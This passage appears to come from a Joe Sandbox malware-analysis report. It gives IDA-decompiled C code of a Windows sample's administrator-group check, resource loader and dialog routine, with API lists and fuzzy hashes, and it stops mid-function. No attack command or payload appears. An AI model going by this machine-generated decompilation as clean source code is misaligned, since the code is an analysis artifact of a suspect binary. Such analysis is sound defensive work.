                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 3785188418-3940384054
                                                                                                                                                                                                        • Opcode ID: 03b643204ea69804d8842ed5cc7cfee3575f9efdb2c819dcf8420f8b5c1227b4
                                                                                                                                                                                                        • Instruction ID: 06653ac8bed8227cd4a6a03516036b5a70eee48cd3d0279e3711ebb5ad89ce15
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03b643204ea69804d8842ed5cc7cfee3575f9efdb2c819dcf8420f8b5c1227b4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23110631314225BFEB215F28AC0CF9E3AA4FB47724F188218FD11911E0DBB98B41D746
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E000C18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t51 = __esi;
                                                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                                                        				_t23 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                        				_t25 =  *0xc8128; // 0x2
                                                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t50 = 2;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if(_t25 != _t50) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					return E000C6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E000C17EE( &_v20) != 0) {
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                                                        						 *0xc8128 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                        					CloseHandle(_v28);
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_pop(_t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                        						LocalFree(_t52);
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if( *_t52 <= 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							FreeSid(_v32);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                        						_t50 = _t15;
                                                                                                                                                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                                                        							_t50 = _t50 + 8;
                                                                                                                                                                                                        							if(_t45 <  *_t52) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xc8128 = 1;
                                                                                                                                                                                                        						_v20 = 1;
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x000c18a3
                                                                                                                                                                                                        0x000c18a3
                                                                                                                                                                                                        0x000c18ab
                                                                                                                                                                                                        0x000c18b2
                                                                                                                                                                                                        0x000c18b5
                                                                                                                                                                                                        0x000c18be
                                                                                                                                                                                                        0x000c18c0
                                                                                                                                                                                                        0x000c18c6
                                                                                                                                                                                                        0x000c18c7
                                                                                                                                                                                                        0x000c18ca
                                                                                                                                                                                                        0x000c18cf
                                                                                                                                                                                                        0x000c19c9
                                                                                                                                                                                                        0x000c19d8
                                                                                                                                                                                                        0x000c19d8
                                                                                                                                                                                                        0x000c18df
                                                                                                                                                                                                        0x000c19b8
                                                                                                                                                                                                        0x000c19bd
                                                                                                                                                                                                        0x000c19bf
                                                                                                                                                                                                        0x000c19bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c19bd
                                                                                                                                                                                                        0x000c18fa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1912
                                                                                                                                                                                                        0x000c19aa
                                                                                                                                                                                                        0x000c19ad
                                                                                                                                                                                                        0x000c19b3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1927
                                                                                                                                                                                                        0x000c1927
                                                                                                                                                                                                        0x000c1932
                                                                                                                                                                                                        0x000c1936
                                                                                                                                                                                                        0x000c19a9
                                                                                                                                                                                                        0x000c19a9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c19a9
                                                                                                                                                                                                        0x000c194c
                                                                                                                                                                                                        0x000c19a2
                                                                                                                                                                                                        0x000c19a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c196e
                                                                                                                                                                                                        0x000c1970
                                                                                                                                                                                                        0x000c1999
                                                                                                                                                                                                        0x000c199c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c199c
                                                                                                                                                                                                        0x000c1972
                                                                                                                                                                                                        0x000c1972
                                                                                                                                                                                                        0x000c1975
                                                                                                                                                                                                        0x000c1984
                                                                                                                                                                                                        0x000c1985
                                                                                                                                                                                                        0x000c198a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c198c
                                                                                                                                                                                                        0x000c1991
                                                                                                                                                                                                        0x000c1996
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1996
                                                                                                                                                                                                        0x000c194c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000C18DD), ref: 000C181A
                                                                                                                                                                                                          • Part of subcall function 000C17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 000C182C
                                                                                                                                                                                                          • Part of subcall function 000C17EE: AllocateAndInitializeSid.ADVAPI32(000C18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000C18DD), ref: 000C1855
                                                                                                                                                                                                          • Part of subcall function 000C17EE: FreeSid.ADVAPI32(?,?,?,?,000C18DD), ref: 000C1883
                                                                                                                                                                                                          • Part of subcall function 000C17EE: FreeLibrary.KERNEL32(00000000,?,?,?,000C18DD), ref: 000C188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 000C18EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 000C18F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 000C190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 000C1918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 000C192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 000C1944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 000C1964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 000C197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 000C199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 000C19A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 000C19AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: a8522ae9a4b04d66b39222d354fb8f6dc82da5295c10ead7e350e11e7f418faa
                                                                                                                                                                                                        • Instruction ID: 677ca962a3628abac62443428a3eacdc84d922468d74443e7614589d9ae85533
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8522ae9a4b04d66b39222d354fb8f6dc82da5295c10ead7e350e11e7f418faa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7313A71A00209AFEB609FA5DC98FEFBBBCFF06344F204429E945D2151DB359905DB61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E000C468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				CHAR* _t14;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                        				_t16 = _t4;
                                                                                                                                                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                        					FreeResource(_t15);
                                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x000c4699
                                                                                                                                                                                                        0x000c469b
                                                                                                                                                                                                        0x000c46a9
                                                                                                                                                                                                        0x000c46af
                                                                                                                                                                                                        0x000c46b4
                                                                                                                                                                                                        0x000c46bc
                                                                                                                                                                                                        0x000c46f9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c46f9
                                                                                                                                                                                                        0x000c46d9
                                                                                                                                                                                                        0x000c46dd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c46e5
                                                                                                                                                                                                        0x000c46ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c46f5
                                                                                                                                                                                                        0x000c46ff

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$cent
                                                                                                                                                                                                        • API String ID: 3370778649-3553536280
                                                                                                                                                                                                        • Opcode ID: 84be63d709f50a41b632f98f36ff61be64c07affdb6a001d97f21656dac5d687
                                                                                                                                                                                                        • Instruction ID: 6c2df2705564e5d1f491839ec89301ff84f19c4ddda9d7320c60e2b8a6cd0611
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84be63d709f50a41b632f98f36ff61be64c07affdb6a001d97f21656dac5d687
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 780186363442147BF36017E56C4DF6F7E6CEBC7BA5F140018FA4A96150C965884586A7
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E000C17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                        					_v20 = _t20;
                                                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                                                        						 *_t37 = 0;
                                                                                                                                                                                                        						_t28 = 1;
                                                                                                                                                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                        							_t37 = _t39;
                                                                                                                                                                                                        							 *0xca288(0, _v24, _v28);
                                                                                                                                                                                                        							_v20();
                                                                                                                                                                                                        							if(_t39 != _t39) {
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							FreeSid(_v24);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t36);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x000c17f6
                                                                                                                                                                                                        0x000c17fd
                                                                                                                                                                                                        0x000c1805
                                                                                                                                                                                                        0x000c180b
                                                                                                                                                                                                        0x000c180d
                                                                                                                                                                                                        0x000c1815
                                                                                                                                                                                                        0x000c1818
                                                                                                                                                                                                        0x000c1820
                                                                                                                                                                                                        0x000c1824
                                                                                                                                                                                                        0x000c182c
                                                                                                                                                                                                        0x000c1832
                                                                                                                                                                                                        0x000c1837
                                                                                                                                                                                                        0x000c1851
                                                                                                                                                                                                        0x000c1854
                                                                                                                                                                                                        0x000c185d
                                                                                                                                                                                                        0x000c1862
                                                                                                                                                                                                        0x000c186c
                                                                                                                                                                                                        0x000c1872
                                                                                                                                                                                                        0x000c1877
                                                                                                                                                                                                        0x000c187e
                                                                                                                                                                                                        0x000c187e
                                                                                                                                                                                                        0x000c1883
                                                                                                                                                                                                        0x000c1883
                                                                                                                                                                                                        0x000c185d
                                                                                                                                                                                                        0x000c188a
                                                                                                                                                                                                        0x000c188a
                                                                                                                                                                                                        0x000c18a2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000C18DD), ref: 000C181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 000C182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(000C18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000C18DD), ref: 000C1855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,000C18DD), ref: 000C1883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,000C18DD), ref: 000C188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: 711a44f79087c671011de315021b54247431c5ead2b25234b1584c859f37d69d
                                                                                                                                                                                                        • Instruction ID: d4723d59d036aef93e4517acc167be74916f8ee15a3291abdd9f16988556fb66
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 711a44f79087c671011de315021b54247431c5ead2b25234b1584c859f37d69d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4119071F00209ABEB109FA4DC49FBEBBB8EF4A744F10016DFA01E2291DB359D048B91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t7 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                        					EndDialog(_a4, 2);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t7 - 0x100;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					_t12 = GetDesktopWindow();
                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                        					E000C43D0(_t24, _t12);
                                                                                                                                                                                                        					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xc9404);
                                                                                                                                                                                                        					SetForegroundWindow(_t24);
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t11 == 1) {
                                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                                        					if(_t22 < 6) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 <= 7) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						EndDialog(_a4, _t22);
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 != 0x839) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xc91dc = 1;
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x000c3459
                                                                                                                                                                                                        0x000c345c
                                                                                                                                                                                                        0x000c34d8
                                                                                                                                                                                                        0x000c34de
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c34e0
                                                                                                                                                                                                        0x000c345e
                                                                                                                                                                                                        0x000c3463
                                                                                                                                                                                                        0x000c349a
                                                                                                                                                                                                        0x000c34a0
                                                                                                                                                                                                        0x000c34a7
                                                                                                                                                                                                        0x000c34b2
                                                                                                                                                                                                        0x000c34c4
                                                                                                                                                                                                        0x000c34cb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c34cb
                                                                                                                                                                                                        0x000c3468
                                                                                                                                                                                                        0x000c346e
                                                                                                                                                                                                        0x000c3474
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c347c
                                                                                                                                                                                                        0x000c348c
                                                                                                                                                                                                        0x000c3490
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3496
                                                                                                                                                                                                        0x000c3484
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3486
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3486
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 000C3490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000C349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 000C34B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 000C34C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 000C34CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 000C34D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 852535152-3940384054
                                                                                                                                                                                                        • Opcode ID: 602d6b25e154ef35b7ffd8b6022eadc2642dc9c4eb47303e3377de8fe70ba891
                                                                                                                                                                                                        • Instruction ID: 114d3cb3a985eee9de71c26b18319ed8c97ec3ee93f51021346d527d43ce8816
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 602d6b25e154ef35b7ffd8b6022eadc2642dc9c4eb47303e3377de8fe70ba891
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD01B131360118ABE72E5F69DC0CE6E3AA5EB46704F048018FE46865A0CB38AF41DB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E000C2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				char _t32;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				char* _t38;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                        				CHAR* _t59;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                        				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                        				_t65 = _a4;
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t64 = __ecx;
                                                                                                                                                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                        					GetModuleFileNameA( *0xc9a3c,  &_v268, 0x104);
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_t17 =  *_t64;
